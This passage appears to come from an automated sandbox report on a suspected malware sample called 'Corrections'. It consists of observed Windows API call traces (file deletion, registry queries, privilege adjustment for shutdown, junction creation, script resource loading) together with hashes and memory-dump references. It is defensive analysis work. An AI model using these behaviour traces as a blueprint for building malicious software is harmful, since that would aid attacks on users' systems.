                                                                                                                                                                                                                                                                                            • Instruction ID: dd27342c324953c0904f7231556b3d4486b3cf722750a5049bd77855c0d8f1d1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7b1a65e9480a62bef853606550105f7dc91d240091e256554cd6a14e8b721fd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF3115316092496BDF24AFB8DC49EEE77ACDF45334F040261F814E2090EB74DE418AA1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00994785
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 009947B2
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 009947E2
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00994803
                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00994813
                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0099489A
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009948A5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 009948B0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                            • Opcode ID: a2e1334eb850bd1c73c6576f832cd8325aa597cfad138b83e5a97bd7ef2fd8ce
                                                                                                                                                                                                                                                                                            • Instruction ID: 82b37b9500c147a34cbdcd0b0ff3ca4c60814d93dfa7837aef60788cb6f6ec8b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2e1334eb850bd1c73c6576f832cd8325aa597cfad138b83e5a97bd7ef2fd8ce
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4031E37191424AABDF219FA4DC49FEF37BCEF89714F1041B6F609D2060EB7496858B24
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0099A203
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0099A25E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A269
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0099A285
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0099A2D5
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(009E7B94), ref: 0099A2F3
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0099A2FD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A30A
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0099A31A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0098E3B4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: be067af6609a7373adee8c5ec0e5abd14ab9ec49b91fcb85e363fa02b2cfbfd8
                                                                                                                                                                                                                                                                                            • Instruction ID: 4f096f6441bf6e34797ab19aa7dfb825e83db918388905c83224fe7281c9cd89
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be067af6609a7373adee8c5ec0e5abd14ab9ec49b91fcb85e363fa02b2cfbfd8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F3104315052596FCF10AFA9EC09EEE77ACDF85338F1442A1F820A3091EB31DE85CA95
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC99E
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 009ACA09
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009ACA2D
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009ACA8C
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009ACB47
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACBB4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACC49
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 009ACC9A
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 009ACD43
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 009ACDE2
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 009ACDEF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 18880a43e6e1af71d6fda5bcd124483f825aee152e5a6abc2649210a1fc555b3
                                                                                                                                                                                                                                                                                            • Instruction ID: 8e52545c2fc05c3791604bfaad47b7dda8f7e9bd332111233dbf5c12e4351ac7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18880a43e6e1af71d6fda5bcd124483f825aee152e5a6abc2649210a1fc555b3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41024EB1604200AFC714DF24C895E2ABBE5EF89314F18849DF849DF2A6DB31ED42CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00925851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009255D1,?,?,00964B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00925871
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098EAB0: GetFileAttributesW.KERNEL32(?,0098D840), ref: 0098EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0098D9CD
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0098DA88
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0098DA9B
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 0098DAB8
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0098DAE2
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0098DAC7,?,?), ref: 0098DB5D
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 0098DAFE
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0098DB0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 919e647a211b2cff38d91ae9b677e0f7cb1439907598d460209c52d14f379cd6
                                                                                                                                                                                                                                                                                            • Instruction ID: 9869a2b7fcd63024cc527f74bddf64eac33a02780be858619ece46bc2f0f03dc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 919e647a211b2cff38d91ae9b677e0f7cb1439907598d460209c52d14f379cd6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C617F7180615DAFCF05FBE0DA92AEDB7B9AF54300F2041A5E406B7295EB316F09DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 02ad6790f0d0b94fd5f1afc43f44ca3cdb1eb9332709087142b2868d81e3474e
                                                                                                                                                                                                                                                                                            • Instruction ID: 02b9cfa7755b7e2dc89b9bf71c17bd35f1718d1d7a039aa1cab5d9a6831f52ee
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02ad6790f0d0b94fd5f1afc43f44ca3cdb1eb9332709087142b2868d81e3474e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD419C31609611EFD710CF19E898B15BBE4FF44328F14C5A8E82A8B762DB35EC42CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00982010: GetLastError.KERNEL32 ref: 00982097
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0098F249
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                            • Opcode ID: a94e1161bc911a67a8a24843bfd56020cf24ae2b2652a9e927834766acb3c772
                                                                                                                                                                                                                                                                                            • Instruction ID: d146777fd4d91377faa19eb5b3dc3c4c2ba273075a77fa282a33368f86ad2a95
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a94e1161bc911a67a8a24843bfd56020cf24ae2b2652a9e927834766acb3c772
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C601497A6252106BEB2472B89C9AFBF736C9F08354F100930FD23E23D2E6644D0093A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095BD54
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095BD78
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095BEFF
                                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,009C46D0), ref: 0095BF11
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009F221C,000000FF,00000000,0000003F,00000000,?,?), ref: 0095BF89
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009F2270,000000FF,?,0000003F,00000000,?), ref: 0095BFB6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0095C0CB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 66fe58edfe7c332085e4d3df09d16e4350cbdfb7f2ab3adc4109691b408f49b2
                                                                                                                                                                                                                                                                                            • Instruction ID: 7161bb89789689af0155bc6ca7afaa1229619ab4a89be3089b488cfa571fcbcc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66fe58edfe7c332085e4d3df09d16e4350cbdfb7f2ab3adc4109691b408f49b2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDC118719042049FDB24DF7ADC42BAA7BBDEF82321F184559ED949B191E7308E49CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009656C2,?,?,00000000,00000000), ref: 00993A1E
                                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009656C2,?,?,00000000,00000000), ref: 00993A35
                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE), ref: 00993A45
                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE), ref: 00993A56
                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(009656C2,?,?,009656C2,?,?,00000000,00000000,?,?,?,?,?,?,009266CE,?), ref: 00993A65
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                            • Opcode ID: 8f741d0a16224ab63b639141175e2e791b0b968372feb30b4355a1b7e92fc082
                                                                                                                                                                                                                                                                                            • Instruction ID: 83a6c7239c3138adaef31a9f8c0685e77593d2362ca3970883016577ffa977a9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f741d0a16224ab63b639141175e2e791b0b968372feb30b4355a1b7e92fc082
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67115A70201741AFEB218F69DD48F277BBDEFC5B61F14826CB41296250EB71DD009620
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00981916
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00981922
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00981931
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00981938
                                                                                                                                                                                                                                                                                              • Part of subcall function 00981900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0098194E
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00981C81), ref: 009820FB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00982107
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0098210E
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00982127
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00981C81), ref: 0098213B
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00982142
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 96b4774f3932e1b3450b91690e268b5ead8234e9b5eaa1e981ce56d917ce50b4
                                                                                                                                                                                                                                                                                            • Instruction ID: ed3fcb6a6a97d32694fb1c01fa56a23435b7ef775d37ab826b32710da390b985
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96b4774f3932e1b3450b91690e268b5ead8234e9b5eaa1e981ce56d917ce50b4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 511100B2519205FFDB14AF64CC0CBAE7BBDEF40365F20411CE941A7220D3399900DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0099A5BD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0099A6D0
                                                                                                                                                                                                                                                                                              • Part of subcall function 009942B9: GetInputState.USER32 ref: 00994310
                                                                                                                                                                                                                                                                                              • Part of subcall function 009942B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009943AB
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0099A5ED
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0099A6BA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: 661ffea26a2655439215b99f9ea2d71525def3a4d3cee869bb16ef678cb62f93
                                                                                                                                                                                                                                                                                            • Instruction ID: ca3d6aa10eba4bfdcc9bb10ec5b8e50b4ea17939a48eb2b1977b722181fe3c42
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 661ffea26a2655439215b99f9ea2d71525def3a4d3cee869bb16ef678cb62f93
